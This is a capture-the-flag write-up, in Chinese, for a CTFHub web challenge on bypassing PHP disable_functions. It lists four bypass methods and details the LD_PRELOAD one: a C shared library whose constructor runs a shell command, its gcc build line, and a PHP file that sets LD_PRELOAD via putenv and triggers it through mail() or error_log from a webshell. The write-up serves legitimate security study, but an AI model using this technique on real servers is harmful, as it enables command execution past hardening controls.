CTFHub:web-LD_PRELOAD-WP

解题思路

思路分析

根据资料可得知有四种绕过 disable_functions 的手法:

  1. 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等
  2. 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的 popen()、proc_open()、pcntl_exec(),逐一尝试,或许有漏网之鱼
  3. mod_cgi 模式,尝试修改 .htaccess,调整请求访问路由,绕过 php.ini 中的任何限制(让特定扩展名的文件直接和php-cgi通信);
  4. 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。

这里我们只详细学习第四种方法。大致步骤如下

  • 生成一个我们的恶意动态链接库文件
  • 利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径
  • 配合php的某个函数去触发我们的恶意动态链接库文件
  • RCE并获取flag

这里面的某个函数需要在运行的时候能够启动子进程,这样才能重新加载我们所设置的环境变量,从而劫持子进程所调用的库函数。

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。putenv()用来改变或增加环境变量的内容. 参数string 的格式为name=value, 如果该环境变量原先存在, 则变量内容会依参数string 改变, 否则此参数内容会成为新的环境变量.

解题过程

我们先生成一个hack.c恶意动态链接库文件

复制代码
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
__attribute__ ((__constructor__)) void angel (void){
    unsetenv("LD_PRELOAD");
    system("/readflag > /tmp/sunian");
}

利用gcc进行编译,虽然报错了,但是不影响

复制代码
gcc -shared -fPIC hack.c -o hack.so

直接拖到蚁剑上去就行了

sunian.php

php 复制代码
<?php
putenv("LD_PRELOAD=/tmp/hack.so");
mail("", "", "", "");
?>

然后去GET请求包含sunian.php url/?ant=include(%27sunian.php%27);

然后发现蚁剑的tmp目录下并没有生成sunian这个文件

所以认为是mail函数无法使用,使用error_log进行替换

再次包含sunian.php,成功生成名为sunian的文件

打开文件拿到flag

相关推荐
私人珍藏库7 分钟前
[Android] 多开空间-一机多账号+应用一键克隆双开
android·人工智能·智能手机·软件
海兰19 分钟前
【SpringBoot 】AOP企业级权限控制方案(二)
android·java·spring boot
阿pin21 分钟前
Android随笔-启动Zygote的rc文件是什么?
android·zygote·rc
帅次10 小时前
Android 高级工程师面试:Java 基础知识 近1年高频追问 22 题
android·java·面试
私人珍藏库11 小时前
[Android] zip解压缩管理-全格式压缩包一键解压+打包
android·app·生活·工具·多功能
雨白12 小时前
C语言:动态内存分配
android
Android-Flutter12 小时前
android compose 自定义Painter绘制图形 使用
android·kotlin·compose
我是一颗柠檬12 小时前
【Java项目技术亮点】覆盖索引与索引下推优化
android·java·开发语言
vigor51214 小时前
MySQL通过Mango实现分库分表
android·数据库·mysql